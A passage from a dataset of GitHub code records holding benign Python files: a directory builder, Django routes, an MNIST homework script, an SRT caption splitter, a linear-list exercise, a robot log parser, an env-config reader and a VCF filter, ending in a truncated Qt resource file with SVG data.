exist_ok=True)\n return\n\nfolder_dict = {'my_project': ['settings', 'tst.py','mainapp', 'adminapp', 'authapp'],\n 'test_file':\n [\n {'super_test': ['test_iq', 'test_fps', 'test.py'],\n 'easy_test':\n [\n {'firts': ['sum_to_10', 'sum_to_100', 'sum.html'],\n 'second':\n [\n {'second_one': ['comparison', 'comp.css'],\n 'second_two': 'brrr.zip',\n 'secon_three': ['free_folder', 'free.file']\n }\n ]\n }\n ],\n 'hard_test': ['fourier_series', 'find_genius', 'logical', 'lg.jpg']\n }\n ]\n }\nif __name__ == \"__main__\":\n path = os.getcwd()\n make_dir_from_dict(folder_dict, path)\n\n'''\nввёл свой словарь, что бы работало для папок и файлов. пример, разобранного задания на вебинаре очнь помог,\nно хотелось это же реализовать через dict.items(). Из-за появления нескольких уровней вложенностей запустался в if - \n- elif. Срипт протестировал на разных словарях, пытаясь добиться универсальности. Можно задавать любую нужную иеархию.\nКак я понял ограничений во вложенности нет.\n'''","repo_name":"Gefahr87/Tatarenko_Vitaly_dz","sub_path":"Python/Task_7/Task_7_1.py","file_name":"Task_7_1.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21491979277","text":"from . import views\nfrom django.urls import path\n\nurlpatterns = [\n path('',views.home,name='home'),\n path('register',views.register,name='register'),\n path('login',views.login,name='login'),\n path('logout',views.logout,name='logout'),\n\n path('add/', views.person_create_view, name='person_add'),\n path('/', views.person_update_view, name='person_change'),\n path('newform', views.newform, name='newform'),\n path('form', views.form, name='form'),\n\n\n path('ajax/load-cities/', views.load_cities, name='ajax_load_cities'),\n\n]\n\n","repo_name":"AnjalyL/AnjalyFinal","sub_path":"lavsproject/credentials/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24080856717","text":"import networkx as nx\nimport pandas as pd\nimport torch\ndata_df = pd.read_csv(\"C:/Users/85433/Desktop/demo/datadata/esca_log.csv\")\ngene_data = data_df.iloc[2:, 0].tolist()\nprint(gene_data)\npathway_file = 'gene_relationship_ke.csv'\npathway_df = pd.read_csv(pathway_file, header=None)\npathway_data = pathway_df.values.tolist()\ngene_id_map = {gene: idx for idx, gene in enumerate(gene_data)}\nG = nx.Graph()\nfor pathway in pathway_data:\n source = pathway[0]\n target = pathway[1]\n if source in gene_data and target in gene_data:\n G.add_edge(gene_id_map[source], gene_id_map[target])\n\nedge_index = torch.tensor(list(G.edges())).t().contiguous()\nprint(edge_index)\nedge_df = pd.DataFrame(edge_index.numpy().transpose())\nedge_file = 'edge_index.csv'\nedge_df.to_csv(edge_file,header=False, index=False)\n","repo_name":"starlightyouth/GDEC","sub_path":"channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73447959481","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n'''\r\n@File : Homework5-2.py \r\n@Contact : 1665219552@qq.com\r\n@License : (C)Copyright 2017-2018, Liugroup-NLPR-CASIA\r\n\r\n@Modify Time @Author @Version @Desciption\r\n------------ ------- -------- -----------\r\n2021/10/31 18:52 xiaoj 1.0 None\r\n'''\r\n\r\n# import lib\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom Homework5.DataSetBean import DataSetBean\r\nimport pickle\r\nimport os\r\nimport gzip\r\nimport utils.DataUtils as dataUtils\r\ndef sigmoid(x):\r\n # y = 1 / (1 + np.exp(-x))\r\n # return y\r\n indices_pos = np.nonzero(x >= 0)\r\n indices_neg = np.nonzero(x < 0)\r\n\r\n y = np.zeros_like(x)\r\n y[indices_pos] = 1 / (1 + np.exp(-x[indices_pos]))\r\n y[indices_neg] = np.exp(x[indices_neg]) / (1 + np.exp(x[indices_neg]))\r\n\r\n return y\r\n\r\ndef predict(network, x):\r\n W1, W2, W3 = network['W1'], network['W2'], network['W3']\r\n b1, b2, b3 = network['b1'], network['b2'], network['b3']\r\n print(W1.shape,W2.shape,W3.shape)\r\n # print(\"before\",W1.shape)\r\n # np.transpose([W1])\r\n # print(\"after\",W1.shape)\r\n a1 = np.dot(x,W1)+b1\r\n z1 =sigmoid(a1)\r\n a2 = np.dot(z1, W2) + b2\r\n z2 = sigmoid(a2)\r\n a3 = np.dot(z2, W3) + b3\r\n y = sigmoid(a3)\r\n return y\r\n\r\n'''\r\n使用pickle的方式加载数据集\r\n@:param \r\n@:returns \r\n'''\r\ndef load(path):\r\n bean = None\r\n with open(path, 'rb') as f:\r\n # ((x_train, y_train), (x_test, y_test)) = pickle.load(f, encoding=\"latin-1\") # 加载数据\r\n paramList = pickle.load(f, encoding=\"latin-1\") # 加载数据\r\n bean = paramList\r\n return bean\r\n\r\n\r\n'''\r\n加载数据,x是图像,y是标签\r\n@:param mnist数据集\r\n@:returns (x_train, y_train), (x_test, y_test) ( 训练图像, 训练标签), ( 测试图像,测试标签) DataSetBean对象\r\n'''\r\ndef get_data(mnist):\r\n x_train_1=[]\r\n y_train_1=[]\r\n x_test_1=[]\r\n y_test_1=[]\r\n # ( 训练图像, 训练标签), ( 测试图像,测试标签)\r\n (x_train, y_train), (x_test, y_test) = mnist.load_data() # 加载数据\r\n\r\n x_train_1 = [0 for i in range(len(x_train))] #range(0,len(x_train))\r\n y_train_1 = []\r\n x_test_1 = []\r\n y_test_1 = []\r\n\r\n # x_train.flatten(True)\r\n print(\"x_train.shape-1\",x_train.shape)\r\n for i in range(len(x_train)):\r\n x_train_1[i]=x_train[i].reshape(784,)\r\n print(\"x_train.shape-2\",x_train.shape)\r\n\r\n x_train, x_test = x_train / 255.0, x_test / 255.0 #样本转为浮点数\r\n\r\n bean = DataSetBean(x_train, y_train, x_test, y_test)\r\n return bean\r\n\r\ndef batch(mnist):\r\n batch_size = 100\r\n accuracy_cnt = 0\r\n network=load(\"../data/sample_weight.pkl\")\r\n # bean = get_data(mnist)\r\n x_train_gz, y_train_gz, x_test_gz, y_test_gz = dataUtils.load_data_gz('../data/')\r\n # x = bean.x_test\r\n # t = bean.y_test\r\n # print(len(x))\r\n for i in range(0, len(x_test_gz), batch_size):\r\n x_batch = x_test_gz[i:i + batch_size]\r\n print(\"x_batch.shape\",x_batch.shape)\r\n\r\n y_batch = predict(network, x_batch)\r\n\r\n p = np.argmax(y_batch, axis=1)\r\n accuracy_cnt += np.sum(p == y_test_gz[i:i + batch_size])\r\n return \"Accuracy:\" + str(float(accuracy_cnt) / len(x_test_gz))\r\n\r\nif __name__ == '__main__':\r\n mnist = tf.keras.datasets.mnist\r\n result = batch(mnist)\r\n print(result)","repo_name":"yuanxiao-pro/-","sub_path":"Homework5/Homework5-2.py","file_name":"Homework5-2.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29819759137","text":"import sys\nimport os\nimport pathlib\nimport shutil\nfrom datetime import datetime, timedelta\nimport textwrap\nimport math\nimport re\n\n\n# define variables\n\nask_path = '' # path to original .srt file\nraw_check = '' # make sure we were given an .srt file\nraw_split = [] # list to split the path and file name\nraw_path = '' # path to files\nraw_name = '' # raw file name\ndis_path = '' # full path to our temp .txt file\nfin_path = '' # full path to our final .srt file\nfin_name = '' # final distilled file name\nbatch_num = 0 # sequential batch number used in new file (will increase with every batch / split)\nbatch_work = [] # list of text lines from temp file to parse\nbatch_time = '00:00:00,000 --> 00:00:00,000' # string we will break into ms integers for maths\nbatch_time_open = '00:00:00.000' # batch open time, timedelta format\nbatch_time_close = '00:00:00.000' # batch close time, timedelta format\nbatch_open = 0 # batch total open time, in ms\nbatch_close = 0 # batch total close time, in ms\nbatch_clock = 0 # actual batch time (batch open to close)\nthis_payload = '' # text from current batch\npayload_length = 0 # number of characters in current batch\none_line_max = 37 # per FCC guidelines, the optimum max line length for a caption\ntwo_line_max = (2 * one_line_max) # per FCC guidelines, the optimum total length per closed caption (2 lines @ max length)\nbatch_shift = [] # manageable slices from oversized batch\nslice_count = 0 # number of slices\nsorted_set = '' # final chronological set of distilled and formatted batches, to be written to file\nevenflow = 0 # even split of batch time into slice time\noddflow = 0 # odd split of batch time into slice time\nslice_cent = 0 # even percent of the whole batch time each slice is\nodd_big = 0 # offset for odd slice, full slice\nodd_small = 0 # offset for odd slice, remainder\n\n# define functions\n\ndef wind_clock(adj_time):\n h, m, s = map(float, adj_time.split(':'))\n adj_time = timedelta(hours=h, minutes=m, seconds=s).total_seconds() * 1000\n adj_time = int(adj_time)\n return adj_time\n\ndef clock_even(time):\n hh = str(int(time/(1000*60*60))%24).zfill(2)\n mm = str(int(time/(1000*60))%60).zfill(2)\n ss = round((time/1000)%60, 3)\n ss = format(ss, '.3f').zfill(6).replace('.', ',')\n return (hh + \":\" + mm + \":\" + ss)\n\n\n# main code\n\ndef main():\n\n # define globals\n global batch_num\n global sorted_set\n\n # ask for the .srt file, and fault gracefully if not found, or if not .srt\n ask_path = input('*** SRT Caption Distiller *** \\n \\n Please type the full path of your .srt file, or drag-and-drop your .srt file into this window, then press \"Enter\": ')\n if os.path.exists(ask_path) is False:\n print('I was unable to find the .srt file at ' + str(ask_path))\n quit()\n raw_check = os.path.splitext(ask_path)[-1]\n if raw_check != '.srt':\n print('The file provided is not a valid .srt file. Please only submit a valid .srt file')\n quit()\n\n # set up all the necessary pathing and naming conventions now\n raw_split = os.path.split(ask_path)\n raw_path = raw_split[0]\n raw_name = raw_split[1]\n dis_path = (raw_path + '/srt_dist_temp.txt')\n fin_name = ((os.path.splitext(raw_name)[0]) + '_distilled.srt')\n fin_path = (raw_path + '/' + fin_name)\n\n # we have to wrap the process in a try, because it gets confused and faults when we run out of batches\n try:\n # copy the chosen .srt file and rename as our temp.txt file\n shutil.copy(ask_path, dis_path)\n\n # line-by-line inbound process loop\n with open(dis_path, 'r') as fin: # open our temp.txt for READ\n batch_work = fin.read().splitlines(True) # pull content into list, broken into individual lines\n\n # parse all batch sections into main variables\n while batch_work: # iterate through list, until empty\n if batch_work[0] == '\\n': # delete errant returns that sometimes get stuck at the top\n batch_work.pop(0)\n batch_time = batch_work[1].strip() # pull timing string, remove newline from result\n x = 2 # reset our counter variable just in case\n this_payload = '' # reset our payload variable just in case\n try:\n while batch_work[x] != '\\n': # stubbornly throws unnecessary exceptions - embedded in 'try' to quash them\n batch_work[x].split('\\n') # pull the line, and remove the hard return\n this_payload += (batch_work[x].strip() + ' ') # add this line plus a space to the payload\n if x < len(batch_work): # exception check for when we reach the end of the file\n x += 1 # increase counter to keep checking lines\n else:\n break\n except (IndexError): # finally break free from the 'while' exception\n pass\n del batch_work[0:x] # remove batch from list that we're about to process\n payload_length = len(this_payload) # get the length of the payload (character count)\n\n # process the payload -- verious methods depending on size and content of playload\n\n # correct a common srt glitch where a space will dissappear between the end of a sentence and the following capital letter\n this_payload = re.sub(r\"(\\w)([A-Z])\", r\"\\1 \\2\", this_payload)\n\n # one line batch - no extra processing, just increase the batch number, insert to sorted_set, and move on to next batch\n if payload_length <= one_line_max:\n batch_num += 1\n sorted_set += (str(batch_num) + '\\n' + batch_time + '\\n' + this_payload + '\\n' + '\\n')\n\n # two line batch - increase the batch number, format strings properly, insert to sorted_set, and move on to next batch\n elif payload_length > one_line_max and payload_length < two_line_max:\n batch_num += 1\n this_payload = textwrap.fill(this_payload, width=one_line_max)\n sorted_set += (str(batch_num) + '\\n' + batch_time + '\\n' + this_payload + '\\n' + '\\n')\n\n # oversized batches - the whole reason for this script. Let's break the clock, slice the playload into proper-sized batches, then rebuild within the given timeframe\n else:\n # pull timestamps, convert to timedelta format (hh:mm:ss.fff), then to ms integer\n batch_time_open = (batch_time[0:12]).replace(',', '.')\n batch_open = wind_clock(batch_time_open)\n batch_time_close = (batch_time[17:]).replace(',', '.')\n batch_close = wind_clock(batch_time_close)\n batch_clock = (batch_close - batch_open)\n\n # break the batch into slices and count them\n batch_shift = textwrap.wrap(this_payload, width=two_line_max)\n slice_count = len(batch_shift)\n\n # slice time evenly to divide given time equally between slices\n evenflow = math.floor(batch_clock / slice_count)\n\n # if we have uneven slice payloads, modify the timing for the full-size slices, versus the last (small) slice, within the given time parameter\n if (len(batch_shift[-1]) <= one_line_max): # if the last slice is only one line or less\n slice_cent = round((100 / slice_count), 2) # figure out our percentage per slice, to sub-split time properly\n oddflow = round(((evenflow / 100) * slice_cent), 2) # divide the total time by the percentage of one slice\n odd_big = int(evenflow + (oddflow / (slice_count - 1))) # spread the lion's share of percentage evenly to full size slices\n odd_small = int(evenflow - oddflow) # subtract an equal total percentage portion from the total for the remainder slice, to get to 100%\n for z in batch_shift:\n batch_num += 1 # increase the batch number\n if z == batch_shift[-1]: # if this is the last loop\n batch_close = (batch_open + odd_small) -1 # increase the clock stop position by smaller amount, then reduce by 1 to compensate for drift\n else: # otherwise this is a full-sized slice, so\n batch_close = (batch_open + odd_big) # increase the clock stop position by larger amount\n batch_time_open = clock_even(batch_open) # calculate and rebuild the open clock string via function\n batch_time_close = clock_even(batch_close) # calculate and rebuild the close clock string via function\n batch_time = (batch_time_open + ' --> ' + batch_time_close) # now we can rebuild the batch_time string for this batch\n\n # format the payload and assemble the pieces\n this_payload = textwrap.fill(z, width=one_line_max)\n sorted_set += (str(batch_num) + '\\n' + batch_time + '\\n' + this_payload + '\\n' + '\\n')\n\n # advance the clock's start position, so we pick up where we left off\n batch_open = (batch_close + 1)\n\n # we have even slice payloads, so we can evenly split the timing\n else:\n for z in batch_shift:\n batch_num += 1 # increase the batch number\n batch_close = (batch_open + evenflow) # increase the clock stop position\n batch_time_open = clock_even(batch_open) # rebuild the open clock via function\n batch_time_close = clock_even(batch_close) # rebuild the close clock via function\n batch_time = (batch_time_open + ' --> ' + batch_time_close) # rebuild the batch_time string for this batch\n\n # format the payload and assemble the pieces\n this_payload = textwrap.fill(z, width=one_line_max)\n sorted_set += (str(batch_num) + '\\n' + batch_time + '\\n' + this_payload + '\\n' + '\\n')\n\n # advance the clock's start position, so we pick up where we left off\n batch_open = (batch_close + 1)\n\n # we've run out of batches, let's wrap things up\n except (IndexError):\n pass\n\n # all data is processed, overwrite everything back into the temp file\n with open(dis_path, 'w') as fout:\n fout.writelines(sorted_set)\n\n # once loaded, change the temp file into the final file\n os.rename(dis_path, fin_path)\n\n # tell the user that the process is done\n print('\\n' + 'The file has been processed successfully,' + '\\n' + 'and saved in the same location as your original file.' + '\\n' + 'Thank you for using SRT Caption Distiller!')\n\n quit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tmaaz/srt-caption-distiller","sub_path":"srt-caption-distiller.py","file_name":"srt-caption-distiller.py","file_ext":"py","file_size_in_byte":12652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16656058588","text":"# 자료구조개론 4주차 과제1\n# 선형 리스트 구현\n# \n# 미래모빌리티학과\n# 2021271402 이지오\n\n# import module for call main\nimport sys\n\n# 1. 동물 = []\nanimals_list = []\n\n\n# 2. 동물 = [동물1, 동물2, 동물3, 동물4]을 만드는 동물 리스트 완성하는 함수()\n# - 빈 칸 추가 후 insert\nanimals = [\"dog\", \"cat\", \"tiger\", \"elephant\", \"giraff\"]\n\ndef add_item(item:any) -> None:\n animals_list.append(None)\n animals_list[len(animals_list) -1] = item\n # print(f\"{item} is added to animals_list.\")\n\ndef default_array():\n # print(\"Set animals_list in Default.\")\n animals_list.clear()\n # print(\"animals_list is now cleared.\")\n for item in animals:\n add_item(item)\n \n\n# 3. 특정 위치에 새로운 동물을 삽입하는 함수()\n# - 0보다 작고, 리스트 크기보다 큰 경우 확인\n# - 빈 칸 추가 후 [맨 뒤 - 1]의 이름을 [맨 뒤]로 복사\n# - 특정 위치 뒤까지 반복\n# - 특정 위치에 insert\ndef insert_item(index:int, item:any) -> None:\n if index < len(animals_list) and index >= -len(animals_list):\n if index < 0:\n index = len(animals_list) + index\n animals_list.append(None)\n last_index = len(animals_list) - 1\n for i in range(last_index - index):\n animals_list[last_index - i] = animals_list[last_index - i - 1]\n animals_list[index] = item\n else:\n raise IndexError(\"Out of list range.\")\n\n\n# 4. 특정 위치의 데이터를 삭제하는 함수()\n# - 0보다 작고, 리스트 크기보다 큰 경우 확인\n# - 특정 위치의 자료 delete\n# - 특정 위치에 특정위치 다음의 자료 복사\n# - [맨 뒤]까지 복사 후 [맨 뒤]는 삭제\ndef delete_item(index:int) -> None:\n if index < len(animals_list) and index >= -len(animals_list):\n if index < 0:\n index = len(animals_list) + index\n last_index = len(animals_list) - 1\n for i in range(last_index - index):\n animals_list[index + i] = animals_list[index + i + 1]\n animals_list.pop(-1)\n else:\n raise IndexError(\"Out of list range.\")\n\n\n# 5. 2~4를 선택하여 각각을 수행하는 main() 함수\ndef main() -> int:\n # 초기화\n default_array()\n while True:\n try:\n # 메뉴 인터페이스 출력\n print()\n print(f\"Now {len(animals_list)} item(s) in animals_list : \")\n print(animals_list)\n print()\n print(\"===== Liner List =====\")\n print(\"1. Add item in list.\")\n print(\"2. Insert item in list.\")\n print(\"3. Delete item in list.\")\n print(\"4. Reset list to default.\")\n print(\"5. Exit\")\n print(\"=\" * 23)\n select = input(\"Select the menu >> \")\n print()\n\n # 메뉴에 맞는 동작 구성\n if select == '1' or select.lower() == \"add\":\n add_item(input(\"[Add] Enter the name of the item >> \"))\n\n elif select == '2' or select.lower() == \"insert\":\n index = int(input(\"[Insert] Enter the index number you want to insert >> \"))\n insert_item(index, input(\"[Insert] Enter the name of the item >> \"))\n\n elif select == '3' or select.lower() == \"delete\":\n delete_item(int(input(\"[Delete] Enter the index number you want to delete >> \")))\n\n elif select == '4' or select.lower() == \"reset\":\n default_array()\n\n elif select == '5' or select.lower() == \"exit\" or select.lower() == \"quit\" or select.lower() == \"end\":\n print(\"Good Bye!\")\n return 0\n else:\n raise ValueError(\"Wrong Input!\")\n\n except Exception as e:\n print()\n print(\"Error : \", e)\n\n\n# main 함수 호출\nif __name__ == \"__main__\":\n sys.exit(main())","repo_name":"geolee1/KUS_DataStructure_2023","sub_path":"linked_list/src/liner_list.py","file_name":"liner_list.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23460192946","text":"#!/usr/bin/python\n\nimport os, sys, getopt\n\nfrom .LogReaderV2 import LogReader\nfrom .LogReaderV2 import Parser\n\nfrom matplotlib import pyplot\nimport numpy\n\nclass XABSLSymbols:\n def __init__(self):\n self.values = {}\n self.decimalIdToName = {}\n self.booleanIdToName = {}\n self.enumIdToName = {}\n\nclass BehaviorParser(Parser):\n def __init__(self):\n Parser.__init__(self)\n self.symbols = XABSLSymbols()\n self.options = []\n self.current_options = {}\n \n def parseOption(self, o):\n \n if o.type == 0: # Option\n optionComplete = self.options[o.option.id]\n self.current_options[optionComplete.name] = { \n 'time': o.option.timeOfExecution,\n 'state': optionComplete.states[o.option.activeState],\n 'stateTime': o.option.stateTime\n }\n \n for so in o.option.activeSubActions:\n self.parseOption(so)\n \n \n def parse(self, name, data):\n self.current_options = {}\n \n if name == 'BehaviorStateComplete':\n message = Parser.parse(self, name, data)\n \n #process options\n self.options = message.options\n \n # process symbols\n for s in message.inputSymbolList.decimal:\n self.symbols.values[s.name] = s.value\n self.symbols.decimalIdToName[s.id] = s.name\n \n for s in message.inputSymbolList.boolean:\n self.symbols.values[s.name] = s.value\n self.symbols.booleanIdToName[s.id] = s.name\n \n for s in message.inputSymbolList.enumerated:\n self.symbols.values[s.name] = s.value\n self.symbols.enumIdToName[s.id] = s.name\n \n return self.symbols.values, self.current_options\n \n \n elif name == 'BehaviorStateSparse':\n message = Parser.parse(self, name, data)\n symbols_values = self.symbols.values.copy()\n \n #process active options\n for o in message.activeRootActions:\n self.parseOption(o)\n \n #process symbols\n for s in message.inputSymbolList.decimal:\n name = self.symbols.decimalIdToName[s.id]\n symbols_values[name] = s.value\n \n for s in message.inputSymbolList.boolean:\n name = self.symbols.booleanIdToName[s.id]\n symbols_values[name] = s.value\n \n for s in message.inputSymbolList.enumerated:\n name = self.symbols.enumIdToName[s.id]\n symbols_values[name] = s.value\n \n return symbols_values, self.current_options\n \n else:\n return Parser.parse(self, name, data)\n \n\ndef behavior(frame):\n try:\n if \"BehaviorStateComplete\" in frame.messages:\n m, o = frame[\"BehaviorStateComplete\"]\n else:\n m, o = frame[\"BehaviorStateSparse\"]\n\n return [m[\"robot_pose.x\"], m[\"robot_pose.y\"], m[\"fall_down_state\"]]\n \n except KeyError as k:\n raise StopIteration\n\n\nif __name__ == \"__main__\":\n\n parser = BehaviorParser()\n fileName = \"./game.log\"\n log = LogReader(fileName, parser)#, filter=headYaw)\n \n # we want only the frames which contain BehaviorState\n b = [behavior(f) for f in log if \"BehaviorStateComplete\" in f.messages or \"BehaviorStateSparse\" in f.messages];\n \n upright = filter(lambda m: m[2] == 1, b)\n fall = filter(lambda m: m[2] != 1, b)\n \n print(\"step 2\")\n du = zip(*upright)\n df = zip(*fall)\n \n pyplot.plot(du[0], du[1], '.')\n pyplot.plot(df[0], df[1], 'o')\n\n pyplot.ylabel('y')\n pyplot.xlabel('x')\n pyplot.show()\n ","repo_name":"BerlinUnited/RoboCupTools","sub_path":"VideoLogLabeling/py/parsers/BehaviorParser.py","file_name":"BehaviorParser.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"1716121392","text":"import contextlib\nimport os\nfrom pathlib import Path\nfrom typing import Union\n\n\nclass MapConfiKToMappingProxy:\n async def aget(self, key, default=None):\n raise NotImplementedError\n\n def get(self, key, default=None):\n raise NotImplementedError\n\n def get_mapping(self, path):\n \"\"\"\n Should return a mapping from the path given\n :param path: str\n :return: Mapping\n \"\"\"\n return NotImplementedError\n\n\nclass EnvMappingProxy(MapConfiKToMappingProxy):\n def __init__(self, path: Union[Path, str] = Path(\".\"), *args, **kwargs):\n assert isinstance(path, (str, Path)), \"unsupported path type {t}\".format(\n t=type(path)\n )\n\n if isinstance(path, str):\n path = Path(path)\n\n if path.suffix != \".env\":\n path = path / \".env\"\n\n self.environ = self.get_mapping(path)\n\n def get(self, key, default=None):\n return self.environ.get(key, default)\n\n def get_mapping(self, path):\n mapping = os.environ.copy()\n\n with contextlib.suppress(FileNotFoundError):\n with open(path, \"r\") as f:\n for line in f.readlines():\n entry = line.strip().split(\"=\", 1)\n\n if len(entry) == 1:\n entry.append(\"\")\n\n name, value = entry\n mapping[name] = value.replace('\"', \"\").replace(\"'\", \"\")\n\n return mapping\n","repo_name":"LeOndaz/confik","sub_path":"confik/proxies.py","file_name":"proxies.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"23660374739","text":"#!/usr/bin/env python3\n# extract somatic mutations.\n# cat somaticMutation.vcf | awk '/^LFYR/ {print}' | wc -l #7054\n\nf_in = open(\"sm_only80x.recode.vcf\")\nf_out = open(\"somaticMutation.vcf\", \"w\")\nfor line in f_in.readlines():\n\tif line.startswith(\"LFYR\"):\n\t\tcolumns = line.split()\n\t\thr = 0\n\t\thv = 0\n\t\thet = 0\n\t\tfor i in range(9, len(columns)):\n\t\t\tgenotype = columns[i].split(\":\")[0]\n\t\t\tif genotype == \"0/0\" or genotype == \"0|0\" :\n\t\t\t\thr += 1\n\t\t\telif genotype == \"1/1\" or genotype == \"1|1\" :\n\t\t\t\thv += 1\n\t\t\telif genotype == \"0/1\" or genotype == \"0|1\" :\n\t\t\t\thet +=1\n\t\tt = hr + hv + het\n\t\tif not (hr == t or hv == t or het == t):\n\t\t\tf_out.write(line)\n\telse:\n\t\tf_out.write(line)\nf_in.close()\nf_out.close()\n","repo_name":"leiyu37/Finnish_eelgrass_milleniumClone","sub_path":"01_fixedSNPcalling/24_extractSomaticMutations.py","file_name":"24_extractSomaticMutations.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"35544211013","text":"# Resource object code (Python 3)\n# Created by: object code\n# Created by: The Resource Compiler for Qt version 6.6.0\n# WARNING! All changes made in this file will be lost!\n\nfrom PySide6 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00%z\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 ?>\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a<\\\npath fill=\\x22#312e\\\n2b\\x22 opacity=\\x221.0\\\n0\\x22 d=\\x22 M 858.33 \\\n310.52 C 858.97 \\\n306.87 858.68 30\\\n0.51 863.10 299.\\\n03 C 867.99 297.\\\n87 868.86 304.86\\\n 869.07 308.01 C\\\n 874.61 358.77 8\\\n79.04 409.67 885\\\n.30 460.34 C 891\\\n.17 412.67 895.6\\\n8 364.83 901.24 \\\n317.12 C 902.00 \\\n313.72 903.86 30\\\n8.57 908.79 311.\\\n05 C 911.76 313.\\\n84 911.49 318.32\\\n 912.14 321.98 C\\\n 915.50 354.47 9\\\n18.96 386.95 922\\\n.48 419.42 C 923\\\n.73 430.72 924.4\\\n5 442.11 926.57 \\\n453.31 C 934.04 \\\n408.72 939.03 36\\\n3.73 946.77 319.\\\n19 C 949.07 319.\\\n05 951.45 318.56\\\n 953.72 319.21 C\\\n 956.90 321.73 9\\\n56.24 326.52 957\\\n.19 329.98 C 961\\\n.20 363.70 965.7\\\n6 397.35 969.94 \\\n431.05 C 970.87 \\\n438.52 971.66 44\\\n6.05 973.47 453.\\\n38 C 981.15 417.\\\n59 987.43 381.50\\\n 994.49 345.58 C\\\n 995.38 341.59 9\\\n96.06 337.00 999\\\n.28 334.09 C 100\\\n3.87 332.26 1006\\\n.82 336.72 1007.\\\n46 340.42 C 1014\\\n.36 376.02 1019.\\\n63 411.95 1027.2\\\n6 447.41 C 1034.\\\n59 416.87 1040.5\\\n8 386.03 1047.45\\\n 355.39 C 1048.2\\\n2 351.86 1050.08\\\n 347.88 1054.00 \\\n347.09 C 1058.54\\\n 347.93 1059.96 \\\n353.01 1061.13 3\\\n56.84 C 1067.26 \\\n383.65 1072.71 4\\\n10.62 1079.38 43\\\n7.30 C 1085.20 4\\\n16.34 1089.65 39\\\n5.05 1094.84 373\\\n.94 C 1095.84 37\\\n0.71 1096.20 366\\\n.51 1099.21 364.\\\n32 C 1101.68 363\\\n.42 1104.50 363.\\\n66 1107.13 363.3\\\n2 C 1114.75 383.\\\n31 1120.30 404.0\\\n1 1126.67 424.42\\\n C 1127.21 424.5\\\n9 1128.29 424.94\\\n 1128.83 425.12 \\\nC 1137.67 414.16\\\n 1146.24 403.00 \\\n1154.95 391.95 C\\\n 1160.52 384.46 \\\n1168.75 378.09 1\\\n178.40 377.56 C \\\n1196.56 376.26 1\\\n214.80 377.25 12\\\n33.00 376.85 C 1\\\n238.56 377.28 12\\\n45.15 375.58 125\\\n0.05 379.16 C 12\\\n52.56 383.96 124\\\n6.69 387.05 1243\\\n.01 385.90 C 122\\\n1.34 386.65 1199\\\n.65 385.28 1178.\\\n00 386.18 C 1172\\\n.26 386.70 1167.\\\n45 390.59 1163.7\\\n8 394.75 C 1153.\\\n70 406.43 1145.1\\\n6 419.37 1134.78\\\n 430.79 C 1132.4\\\n8 433.35 1128.71\\\n 434.87 1125.30 \\\n433.72 C 1120.79\\\n 431.91 1118.54 \\\n427.13 1117.35 4\\\n22.74 C 1112.41 \\\n407.69 1108.64 3\\\n92.26 1102.89 37\\\n7.49 C 1096.71 4\\\n00.52 1092.17 42\\\n3.97 1085.88 446\\\n.97 C 1085.66 45\\\n0.87 1082.16 455\\\n.55 1077.86 454.\\\n28 C 1073.24 453\\\n.31 1073.52 447.\\\n32 1072.04 443.9\\\n4 C 1065.82 417.\\\n90 1060.59 391.6\\\n4 1054.25 365.64\\\n C 1046.22 397.5\\\n1 1040.56 429.97\\\n 1032.87 461.92 \\\nC 1032.22 466.23\\\n 1027.24 470.29 \\\n1023.39 466.63 C\\\n 1019.75 459.16 \\\n1019.13 450.63 1\\\n017.49 442.58 C \\\n1012.23 413.61 1\\\n007.57 384.50 10\\\n01.41 355.71 C 9\\\n93.63 393.18 986\\\n.88 430.86 979.5\\\n2 468.42 C 978.5\\\n4 472.73 977.81 \\\n479.67 972.07 48\\\n0.11 C 968.24 47\\\n8.40 967.02 473.\\\n84 966.84 470.03\\\n C 961.40 429.91\\\n 957.26 389.57 9\\\n50.94 349.57 C 9\\\n44.23 391.11 938\\\n.73 432.84 932.5\\\n7 474.47 C 931.9\\\n1 478.56 930.95 \\\n482.61 929.77 48\\\n6.58 C 927.97 48\\\n6.73 924.37 487.\\\n03 922.57 487.17\\\n C 915.07 441.96\\\n 913.04 395.97 9\\\n06.44 350.60 C 9\\\n01.64 388.86 897\\\n.97 427.27 893.6\\\n0 465.59 C 892.2\\\n2 476.25 892.19 \\\n487.14 889.48 49\\\n7.59 C 889.15 50\\\n1.07 883.35 502.\\\n48 881.75 499.25\\\n C 880.23 496.86\\\n 880.15 493.83 8\\\n79.68 491.16 C 8\\\n74.49 443.34 870\\\n.43 395.38 864.6\\\n3 347.62 C 861.6\\\n2 377.85 860.02 \\\n408.19 857.69 43\\\n8.47 C 857.15 44\\\n1.88 857.28 445.\\\n60 855.69 448.78\\\n C 853.57 449.40\\\n 851.33 449.27 8\\\n49.16 449.31 C 